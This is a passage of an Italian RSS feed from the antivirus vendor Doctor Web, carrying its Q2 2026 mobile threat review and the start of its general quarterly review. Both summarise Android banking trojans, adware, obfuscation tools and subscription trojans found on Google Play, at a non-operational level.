alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Account YouTube con un indirizzo URL crittografato&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dopo la decodifica, il trojan ottiene un dominio C2 a cui esso si connette per ricevere il payload, che è simile alla fase 2.&lt;/p&gt;&lt;p&gt;La descrizione del funzionamento del trojan ci permette di concludere che esso rappresenta un pericolo elevato a causa della combinazione di diverse funzioni malevole. Per evitare l'infezione del proprio computer e l'ulteriore diffusione del trojan, vi consigliamo di aggiornare regolarmente i database antivirus e controllare tutti i file scaricati da internet. Gli utenti dell'antivirus Dr.Web Security Space e Dr.Web Desktop Security Suite possono essere tranquilli, in quanto il trojan viene rilevato ed eliminato in modo affidabile dagli antivirus Dr.Web. I file di tipo .vcxproj, .csproj e imgui vengono curati, da essi viene eliminato il codice malevolo.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15274&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in II trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15274&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Jul 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 luglio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel II trimestre 2026 si osservava una diminuzione dell'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; — del 31,83% rispetto al I trimestre. Ciononostante, essi sono rimasti il malware per Android più diffuso: questa famiglia ha rappresentato il 23,28% dei rilevamenti del relativo tipo di minacce. Questi programmi malevoli rubano diversi dati riservati, come ad esempio SMS con codici monouso di istituti di credito, login e password di account di home banking, nonché possono visualizzare finestre di phishing. Come anche nel trimestre precedente, gli utenti riscontravano prevalentemente la sottofamiglia Android.Banker.Mamont, che include varie applicazioni malevole.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Durante i tre mesi passati, è continuato il calo dell'attività dei trojan pubblicitari delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Tuttavia, esse sono ancora una delle applicazioni malevole Android più frequentemente riscontrate, e alcune loro varianti sono come prima tra i malware leader per il numero di rilevamenti.&lt;/p&gt;

&lt;p&gt;Il software potenzialmente pericoloso più diffuso con una quota oltre il 66% di nuovo sono stati i programmi in cui, per confondere la logica, è aggiunto codice spazzatura (rilevati come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Questa modificazione viene effettuata tramite gli strumenti hacker per il modding NP Manager. Questi strumenti vengono utilizzati anche dai malintenzionati — per proteggere i programmi malevoli, come i trojan bancari &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, dal rilevamento tramite antivirus.&lt;/p&gt;

&lt;p&gt;Alla seconda posizione si sono classificate le applicazioni che anche vengono modificate tramite l'utility NP Manager, ma con l'utilizzo di alcune delle sue altre funzionalità. Ad esempio, in questo strumento sono previsti diversi moduli per la protezione e l'offuscamento del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la loro modificazione. Gli attori di minacce utilizzano queste funzionalità per proteggere i malware dagli antivirus. I prodotti antivirus Dr.Web rilevano i programmi modificati in questo modo come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Tra le applicazioni potenzialmente pericolose più diffuse di nuovo si trovano anche i programmi modificati tramite l'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Per la loro modificazione, l'utility scarica da internet script appositamente preparati.&lt;/p&gt;

&lt;p&gt;I programmi indesiderati più attivi nel II trimestre sono state le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, che imitano il funzionamento di antivirus. Presumibilmente rileverebbero alcune minacce e quindi suggeriscono l'acquisto di una versione completa per "combatterle". Le simili applicazioni false hanno rappresentato oltre il 44% dei software indesiderati rilevati sui dispositivi Android.&lt;/p&gt;

&lt;p&gt;I software pubblicitari più diffusi sono stati i moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, che possono essere incorporati in applicazioni Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Questi moduli raccolgono anche vari dati riservati. Inoltre, gli utenti come prima riscontravano i programmi di ottimizzazione &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Essi creano periodicamente notifiche con i messaggi fuorvianti su presunti errori di sistema e memoria operativa insufficiente. Queste app visualizzano annunci pubblicitari durante "l'ottimizzazione". Anche i programmi pubblicitari &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Hanno manifestato nuovamente un'alta attività. I malintenzionati li spacciano per app con cheat che presumibilmente consentirebbero di ottenere risorse in giochi, ma in realtà i programmi solo caricano siti con annunci.&lt;/p&gt;

&lt;p&gt;All'inizio di giugno gli specialisti dell'azienda Doctor Web hanno segnalato &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; — un trojan che è capace di aggirare le restrizioni del sistema operativo Android e visualizzare la pubblicità in background. A questo scopo, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sfrutta applicazioni di terze parti, nonché utilizza determinate tecniche che esso seleziona in base al produttore del dispositivo infetto. Abbiamo parlato di questo trojan in maggior dettaglio nel &lt;a href="https://news.drweb-av.it/show/?i=15262" target="_blank"&gt;materiale&lt;/a&gt; corrispondente sul nostro sito.&lt;/p&gt;

&lt;p&gt;Durante il II trimestre, gli analisti dei virus Doctor Web hanno rilevato sullo store di app Google Play ulteriori programmi malevoli che abbonano le loro vittime a servizi a pagamento. Includevano, in particolare, campioni delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;I trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; rimangono i programmi malevoli per SO Android più diffusi.&lt;/li&gt;
        &lt;li&gt;Gli attori di minacce continuano a utilizzare attivamente gli strumenti per il modding di programmi Android per proteggere i trojan bancari dal rilevamento tramite antivirus. &lt;/li&gt;
        &lt;li&gt;Diminuisce di nuovo l'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;È rilevato un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, che utilizza applicazioni di terze parti per aggirare le restrizioni di SO Android e visualizzare la pubblicità in background.&lt;/li&gt;
        &lt;li&gt;Compaiono nuovi programmi malevoli sullo store di app Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue, e in alcuni casi, vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza nel sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan bancario che intercetta gli SMS con codici monouso da istituti di credito, il contenuto di notifiche, nonché raccoglie altre informazioni confidenziali. Queste ultime includono dati tecnici sul dispositivo infetto, la lista di applicazioni installate, informazioni sulla scheda SIM, su chiamate ed SMS ricevuti e inviati.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito, hanno una lista di sistemi di pagamento e banche più popolari, attraverso cui presumibilmente sarebbe possibile ritirare i premi. Ma anche quando gli utenti riescono ad accumulare la somma da ritirare sufficiente, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi Android in cui tramite strumenti hacker per il modding di applicazioni è aggiunto codice spazzatura. Tale modificazione viene eseguita allo scopo di confondere la logica dei programmi. Questa tecnica è spesso riscontrata nei trojan bancari e nelle versioni pirata di software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi di ottimizzazione che creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema allo scopo di visualizzare annunci pubblicitari durante "l'ottimizzazione".&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applicazioni spacciate per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, sono creati per la visualizzazione di pubblicità. Questi programmi ricevono dal server remoto la configurazione, in base alla quale caricano un sito target con annunci: banner, finestre a comparsa, filmati ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che può essere integrato in programmi Android. Visualizza notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questo modulo raccoglie una serie di dati riservati, ed è in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app, e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Durante il II trimestre 2026, gli analisti dei virus dell'azienda Doctor Web hanno rilevato sullo store di app Google Play diversi nuovi programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento. Venivano distribuiti sotto la falsa apparenza di svariati software: un servizio di streaming ShowLounge - TV &amp; Dramas (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.25&lt;/b&gt;), un programma per giocatori AIM: Crosshair Asist (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.26&lt;/b&gt;), un gioco True Cargo Drive (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.27&lt;/b&gt;), un'utility Battery 3D: Charge Effects (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.28&lt;/b&gt;) e un editor di immagini PixStudio - Photo Editor (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.29&lt;/b&gt;). Il numero complessivo di download è stato almeno 2.600.000.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di programmi trojan &lt;b&gt;Android.Subscription&lt;/b&gt;, rilevati su Google Play in II trimestre 2026&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Le applicazioni malevole di questo tipo caricano siti web dove tramite la tecnologia Wap Click gli utenti vengono iscritti ad abbonamenti mobili a pagamento. Alle potenziali vittime viene chiesto il loro numero di cellulare, e dopo il suo inserimento, viene eseguito un tentativo di attivazione dei servizi corrispondenti.&lt;/p&gt;

&lt;p&gt;Su Google Play di nuovo venivano distribuiti i programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, i quali anche abbonano le loro vittime a servizi a pagamento. I malintenzionati li spacciavano per app di messaggistica: Chat Messages (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2625&lt;/b&gt;) e Easy Messages (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2632&lt;/b&gt;), nonché per utility di ottimizzazione del sistema: Smart File Cleaner, Junk Clean Master e Fast Cleaner (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2614&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2618&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2626&lt;/b&gt; rispettivamente).&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Una delle app malevole in cui erano nascosti i trojan della famiglia &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per la protezione dei dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15275&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in II trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15275&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Jul 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 luglio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel II trimestre 2026 il numero totale di minacce rilevate è aumentato del 5,72% rispetto al I trimestre. Il numero di minacce uniche è cresciuto del 95,32%. Venivano prevalentemente rilevati sui dispositivi protetti le applicazioni pubblicitarie e i trojan pubblicitari, i programmi malevoli cryptominer e i trojan che vengono utilizzati per l'avvio di altre minacce. &lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Nel traffico email venivano rilevati con maggiore frequenza gli script malevoli e le varie applicazioni trojan, tra cui downloader, dropper, password stealer e cryptominer. Erano diffusi anche i backdoor, i documenti di phishing e i vari exploit.&lt;/p&gt;

&lt;p&gt;Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione nella maggior parte dei casi riscontravano &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; e &lt;b&gt;Trojan.Encoder.37400&lt;/b&gt;. Allo stesso tempo, il numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web è diminuito leggermente rispetto al trimestre precedente.&lt;/p&gt;

&lt;p&gt;Nel II trimestre 2026 gli analisti internet dell'azienda Doctor Web osservavano una crescita del numero di attacchi di phishing agli utenti del programma di messaggistica MAX. Inoltre, i malintenzionati sfruttavano le tematiche delle notizie attuali e adattavano di conseguenza i popolari schemi fraudolenti.&lt;/p&gt;

&lt;p&gt;Ad aprile è emerso che uno degli aggiornamenti di Microsoft Visual Studio Code &lt;a href="https://news.drweb-av.it/show/?i=15146" target="_blank"&gt;conteneva codice malevolo&lt;/a&gt;. Era uno script trojan facente parte della libreria pubblica JavaScript es5-ext, la quale era stata inclusa nel software aggiornato. Questo script viene avviato a condizione di corrispondenza del fuso orario di alcune città russe e visualizza un appello con una posizione anti-russa nella console dello sviluppatore.&lt;/p&gt;

&lt;p&gt;A maggio &lt;a href="https://news.drweb-av.it/show/?i=15253" target="_blank"&gt;abbiamo avvertito&lt;/a&gt; della diffusione del programma malevolo JobStealer, mirato agli utenti di Mac e Windows. I cybercriminali lo spacciavano per software per colloqui di lavoro online. Il trojan JobStealer ruba varie informazioni riservate, tra cui i dati da circa 300 estensioni di browser di portafogli di criptovalute, i file del programma di messaggistica Telegram, le password e i dati di carte bancarie salvati nei browser, nonché i file cookie.&lt;/p&gt;

&lt;p&gt;A giugno gli specialisti del laboratorio antivirus dell'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15262" target="_blank"&gt;hanno segnalato&lt;/a&gt; un nuovo trojan pubblicitario &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, che è capace di visualizzare annunci in modalità background grazie alla possibilità di aggirare le restrizioni del sistema operativo Android. A questo scopo, il trojan sfrutta applicazioni di terze parti selezionando la tecnica adatta a seconda del produttore del dispositivo target.&lt;/p&gt;

&lt;p&gt;Tra le applicazioni malevole per dispostivi Android, sono rimasti leader per il numero di rilevamenti sui dispositivi protetti i trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Allo stesso tempo, gli attori di minacce hanno continuato a utilizzare attivamente i vari strumenti per il modding di programmi Android per proteggere i software malevoli dal rilevamento tramite antivirus. Inoltre, durante il II trimestre i nostri analisti dei virus hanno rilevato sullo store di app Google Play una serie di nuovi programmi trojan creati per iscrivere utenti a servizi mobili a pagamento.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Aumenta il numero di minacce rilevate sui dispositivi protetti.&lt;/li&gt;
        &lt;li&gt;Tra le minacce rilevate, aumenta significativamente il numero di file unici.&lt;/li&gt;
        &lt;li&gt;Il numero di richieste di decriptazione dei file colpiti dai trojan ransomware di criptazione diminuisce rispetto al I trimestre.&lt;/li&gt;
        &lt;li&gt;I truffatori iniziano ad attaccare più spesso gli utenti del servizio di messaggistica russo MAX.&lt;/li&gt;
